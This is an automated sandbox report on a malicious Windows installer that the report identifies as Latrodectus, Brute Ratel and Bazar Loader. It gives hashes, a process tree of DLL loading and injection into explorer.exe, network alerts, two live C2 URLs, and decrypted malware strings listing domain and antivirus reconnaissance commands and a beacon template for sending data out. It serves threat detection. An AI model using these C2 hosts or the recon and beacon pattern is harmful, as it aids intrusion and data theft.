Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
das.msi

Overview

General Information

Sample name:das.msi
Analysis ID:1525187
MD5:3cb6b99b20930ac0dbadc10899dc511e
SHA1:570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
SHA256:ea1792f689bfe5ad3597c7f877b66f9fcf80d732e5233293d52d374d50cab991
Tags:BruteRatelBruteRatelmsiuser-k3dg3___
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7384 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\das.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7452 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7500 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIA029.tmp (PID: 7576 cmdline: "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 7632 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7656 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Latrodectus, LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
    00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
      00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
        00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
          00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.rundll32.exe.16ad2750000.4.raw.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
              6.2.rundll32.exe.16ad2700000.2.raw.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
                6.2.rundll32.exe.16ad2750000.4.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: RunDLL32 Spawning Explorer
                  Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7656, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4056, ProcessName: explorer.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T20:46:23.711911+020020487351A Network Trojan was detected192.168.2.762255188.114.97.3443TCP
                  2024-10-03T20:46:26.100541+020020487351A Network Trojan was detected192.168.2.762257188.114.97.3443TCP
                  2024-10-03T20:46:27.207379+020020487351A Network Trojan was detected192.168.2.762258188.114.97.3443TCP
                  2024-10-03T20:46:28.269400+020020487351A Network Trojan was detected192.168.2.762259188.114.97.3443TCP
                  2024-10-03T20:46:29.404610+020020487351A Network Trojan was detected192.168.2.762261188.114.97.3443TCP
                  2024-10-03T20:46:30.513577+020020487351A Network Trojan was detected192.168.2.762263188.114.97.3443TCP
                  2024-10-03T20:46:32.022400+020020487351A Network Trojan was detected192.168.2.762265188.114.97.3443TCP
                  2024-10-03T20:46:33.059468+020020487351A Network Trojan was detected192.168.2.762267188.114.97.3443TCP
                  2024-10-03T20:46:34.597775+020020487351A Network Trojan was detected192.168.2.762270188.114.97.3443TCP
                  2024-10-03T20:46:35.666259+020020487351A Network Trojan was detected192.168.2.762271188.114.97.3443TCP
                  2024-10-03T20:46:37.202295+020020487351A Network Trojan was detected192.168.2.762272188.114.97.3443TCP
                  2024-10-03T20:46:38.255571+020020487351A Network Trojan was detected192.168.2.762273188.114.97.3443TCP
                  2024-10-03T20:46:39.373531+020020487351A Network Trojan was detected192.168.2.762274188.114.97.3443TCP
                  2024-10-03T20:46:40.447990+020020487351A Network Trojan was detected192.168.2.762276188.114.97.3443TCP
                  2024-10-03T20:46:41.511634+020020487351A Network Trojan was detected192.168.2.762278188.114.97.3443TCP
                  2024-10-03T20:46:42.995957+020020487351A Network Trojan was detected192.168.2.762279188.114.97.3443TCP
                  2024-10-03T20:46:44.030722+020020487351A Network Trojan was detected192.168.2.762282188.114.97.3443TCP
                  2024-10-03T20:46:45.864454+020020487351A Network Trojan was detected192.168.2.762284188.114.97.3443TCP
                  2024-10-03T20:46:47.025591+020020487351A Network Trojan was detected192.168.2.762286188.114.97.3443TCP
                  2024-10-03T20:46:48.260455+020020487351A Network Trojan was detected192.168.2.762289188.114.97.3443TCP
                  2024-10-03T20:46:49.298261+020020487351A Network Trojan was detected192.168.2.762290188.114.97.3443TCP
                  2024-10-03T20:46:50.349763+020020487351A Network Trojan was detected192.168.2.762291188.114.97.3443TCP
                  2024-10-03T20:46:52.308439+020020487351A Network Trojan was detected192.168.2.762293188.114.97.3443TCP
                  2024-10-03T20:46:53.858658+020020487351A Network Trojan was detected192.168.2.762296188.114.97.3443TCP
                  2024-10-03T20:46:54.910875+020020487351A Network Trojan was detected192.168.2.762297188.114.97.3443TCP
                  2024-10-03T20:46:57.049622+020020487351A Network Trojan was detected192.168.2.762300188.114.97.3443TCP
                  2024-10-03T20:46:58.113573+020020487351A Network Trojan was detected192.168.2.762304188.114.97.3443TCP
                  2024-10-03T20:46:59.212721+020020487351A Network Trojan was detected192.168.2.762306188.114.97.3443TCP
                  2024-10-03T20:47:00.221486+020020487351A Network Trojan was detected192.168.2.762307188.114.97.3443TCP
                  2024-10-03T20:47:01.259683+020020487351A Network Trojan was detected192.168.2.762308188.114.97.3443TCP
                  2024-10-03T20:47:02.284847+020020487351A Network Trojan was detected192.168.2.762310188.114.97.3443TCP
                  2024-10-03T20:47:03.732492+020020487351A Network Trojan was detected192.168.2.762313188.114.97.3443TCP
                  2024-10-03T20:47:04.881395+020020487351A Network Trojan was detected192.168.2.762314188.114.97.3443TCP
                  2024-10-03T20:47:06.129772+020020487351A Network Trojan was detected192.168.2.762315188.114.97.3443TCP
                  2024-10-03T20:47:07.674325+020020487351A Network Trojan was detected192.168.2.762318188.114.97.3443TCP
                  2024-10-03T20:47:08.802832+020020487351A Network Trojan was detected192.168.2.762320188.114.97.3443TCP
                  2024-10-03T20:47:11.834943+020020487351A Network Trojan was detected192.168.2.762321188.114.97.3443TCP
                  2024-10-03T20:47:13.008328+020020487351A Network Trojan was detected192.168.2.762323188.114.97.3443TCP
                  2024-10-03T20:47:14.178016+020020487351A Network Trojan was detected192.168.2.762326188.114.97.3443TCP
                  2024-10-03T20:47:15.980420+020020487351A Network Trojan was detected192.168.2.762329188.114.97.3443TCP
                  2024-10-03T20:47:16.984355+020020487351A Network Trojan was detected192.168.2.762331188.114.97.3443TCP
                  2024-10-03T20:47:18.458657+020020487351A Network Trojan was detected192.168.2.762332188.114.97.3443TCP
                  2024-10-03T20:47:19.565813+020020487351A Network Trojan was detected192.168.2.762334188.114.97.3443TCP
                  2024-10-03T20:47:20.736109+020020487351A Network Trojan was detected192.168.2.762337188.114.97.3443TCP
                  2024-10-03T20:47:21.712455+020020487351A Network Trojan was detected192.168.2.762338188.114.97.3443TCP
                  2024-10-03T20:47:23.221995+020020487351A Network Trojan was detected192.168.2.762339188.114.97.3443TCP
                  2024-10-03T20:47:24.278384+020020487351A Network Trojan was detected192.168.2.762340188.114.97.3443TCP
                  2024-10-03T20:47:25.556024+020020487351A Network Trojan was detected192.168.2.762341188.114.97.3443TCP
                  2024-10-03T20:47:26.721847+020020487351A Network Trojan was detected192.168.2.762344188.114.97.3443TCP
                  2024-10-03T20:47:27.729852+020020487351A Network Trojan was detected192.168.2.762346188.114.97.3443TCP
                  2024-10-03T20:47:28.950593+020020487351A Network Trojan was detected192.168.2.762347188.114.97.3443TCP
                  2024-10-03T20:47:30.020614+020020487351A Network Trojan was detected192.168.2.762348188.114.97.3443TCP
                  2024-10-03T20:47:31.476587+020020487351A Network Trojan was detected192.168.2.762351188.114.97.3443TCP
                  2024-10-03T20:47:32.614704+020020487351A Network Trojan was detected192.168.2.762353188.114.97.3443TCP
                  2024-10-03T20:47:33.711609+020020487351A Network Trojan was detected192.168.2.762354188.114.97.3443TCP
                  2024-10-03T20:47:34.719024+020020487351A Network Trojan was detected192.168.2.762356188.114.97.3443TCP
                  2024-10-03T20:47:35.752045+020020487351A Network Trojan was detected192.168.2.762357188.114.97.3443TCP
                  2024-10-03T20:47:37.185677+020020487351A Network Trojan was detected192.168.2.762358188.114.97.3443TCP
                  2024-10-03T20:47:38.246548+020020487351A Network Trojan was detected192.168.2.762359188.114.97.3443TCP
                  2024-10-03T20:47:39.508692+020020487351A Network Trojan was detected192.168.2.762362188.114.97.3443TCP
                  2024-10-03T20:47:40.567827+020020487351A Network Trojan was detected192.168.2.762364188.114.97.3443TCP
                  2024-10-03T20:47:42.250782+020020487351A Network Trojan was detected192.168.2.762365188.114.97.3443TCP
                  2024-10-03T20:47:43.225425+020020487351A Network Trojan was detected192.168.2.762366188.114.97.3443TCP
                  2024-10-03T20:47:45.130525+020020487351A Network Trojan was detected192.168.2.762368188.114.97.3443TCP
                  2024-10-03T20:47:46.099522+020020487351A Network Trojan was detected192.168.2.762371188.114.97.3443TCP
                  2024-10-03T20:47:47.734329+020020487351A Network Trojan was detected192.168.2.762372188.114.97.3443TCP
                  2024-10-03T20:47:49.535698+020020487351A Network Trojan was detected192.168.2.762373188.114.97.3443TCP
                  2024-10-03T20:47:50.618508+020020487351A Network Trojan was detected192.168.2.762375188.114.97.3443TCP
                  2024-10-03T20:47:51.639691+020020487351A Network Trojan was detected192.168.2.762377188.114.97.3443TCP
                  2024-10-03T20:47:52.964120+020020487351A Network Trojan was detected192.168.2.762379188.114.97.3443TCP
                  2024-10-03T20:47:54.050490+020020487351A Network Trojan was detected192.168.2.762380188.114.97.3443TCP
                  2024-10-03T20:47:54.999833+020020487351A Network Trojan was detected192.168.2.762381188.114.97.3443TCP
                  2024-10-03T20:47:56.164996+020020487351A Network Trojan was detected192.168.2.762383188.114.97.3443TCP
                  2024-10-03T20:47:57.332108+020020487351A Network Trojan was detected192.168.2.762386188.114.97.3443TCP
                  2024-10-03T20:47:59.334690+020020487351A Network Trojan was detected192.168.2.762387188.114.97.3443TCP
                  2024-10-03T20:48:00.429921+020020487351A Network Trojan was detected192.168.2.762389188.114.97.3443TCP
                  2024-10-03T20:48:01.530380+020020487351A Network Trojan was detected192.168.2.762391188.114.97.3443TCP
                  2024-10-03T20:48:02.553108+020020487351A Network Trojan was detected192.168.2.762393188.114.97.3443TCP
                  2024-10-03T20:48:04.306298+020020487351A Network Trojan was detected192.168.2.762394188.114.97.3443TCP
                  2024-10-03T20:48:05.259652+020020487351A Network Trojan was detected192.168.2.762395188.114.97.3443TCP
                  2024-10-03T20:48:06.278435+020020487351A Network Trojan was detected192.168.2.762396188.114.97.3443TCP
                  2024-10-03T20:48:07.325362+020020487351A Network Trojan was detected192.168.2.762399188.114.97.3443TCP
                  2024-10-03T20:48:08.426572+020020487351A Network Trojan was detected192.168.2.762401188.114.97.3443TCP
                  2024-10-03T20:48:09.541793+020020487351A Network Trojan was detected192.168.2.762402188.114.97.3443TCP
                  2024-10-03T20:48:10.567658+020020487351A Network Trojan was detected192.168.2.762404188.114.97.3443TCP
                  2024-10-03T20:48:11.950698+020020487351A Network Trojan was detected192.168.2.762407188.114.97.3443TCP
                  2024-10-03T20:48:12.965872+020020487351A Network Trojan was detected192.168.2.762408188.114.97.3443TCP
                  2024-10-03T20:48:14.586417+020020487351A Network Trojan was detected192.168.2.762409188.114.97.3443TCP
                  2024-10-03T20:48:15.633108+020020487351A Network Trojan was detected192.168.2.762410188.114.97.3443TCP
                  2024-10-03T20:48:16.758167+020020487351A Network Trojan was detected192.168.2.762412188.114.97.3443TCP
                  2024-10-03T20:48:17.767808+020020487351A Network Trojan was detected192.168.2.762414188.114.97.3443TCP
                  2024-10-03T20:48:18.783654+020020487351A Network Trojan was detected192.168.2.762416188.114.97.3443TCP
                  2024-10-03T20:48:20.885532+020020487351A Network Trojan was detected192.168.2.762417188.114.97.3443TCP
                  2024-10-03T20:48:21.984824+020020487351A Network Trojan was detected192.168.2.762420188.114.97.3443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                  Sample uses string decryption to hide its real strings
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c ipconfig /all
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c systeminfo
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c nltest /domain_trusts
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c net view /all
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c nltest /domain_trusts /all_trusts
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c net view /all /domain
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &ipconfig=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c net group "Domain Admins" /domain
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c net config workstation
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c whoami /groups
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &systeminfo=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &domain_trusts=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &domain_trusts_all=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_view_all_domain=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_view_all=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_group=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &wmic=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_config_ws=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_wmic_av=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &whoami_group=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "pid":
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%d",
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "proc":
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%s",
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "subproc": [
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &proclist=[
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "pid":
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%d",
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "proc":
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%s",
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "subproc": [
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &desklinks=[
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: *.*
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%s"
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Update_%x
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Custom_update
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: .dll
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: .exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Error
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: runnung
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %s/%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: front
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /files/
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Alpha
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Cookie:
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: POST
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: GET
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: curl/7.88.1
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: CLEARURL
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: URLS
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: COMMAND
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: ERROR
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: [{"data":"
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "}]
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &dpost=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: https://isomicrotich.com/test/
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: https://opewolumeras.com/test/
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: \*.dll
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: AppData
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Desktop
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Startup
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Personal
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Local AppData
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %s%d.dll
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: <!DOCTYPE
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Content-Length: 0
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: <html>
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Content-Type: application/dns-message
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Content-Type: application/ocsp-request
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: 12345
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: 12345
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &stiller=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %s%d.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %x%x
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &mac=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %02x
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: :%02x
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &computername=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &domain=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: LogonTrigger
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: \Registry\Machine\
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: TimeTrigger
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: PT0H%02dM
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: PT0S
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: \update_data.dat
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:62255 version: TLS 1.2
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
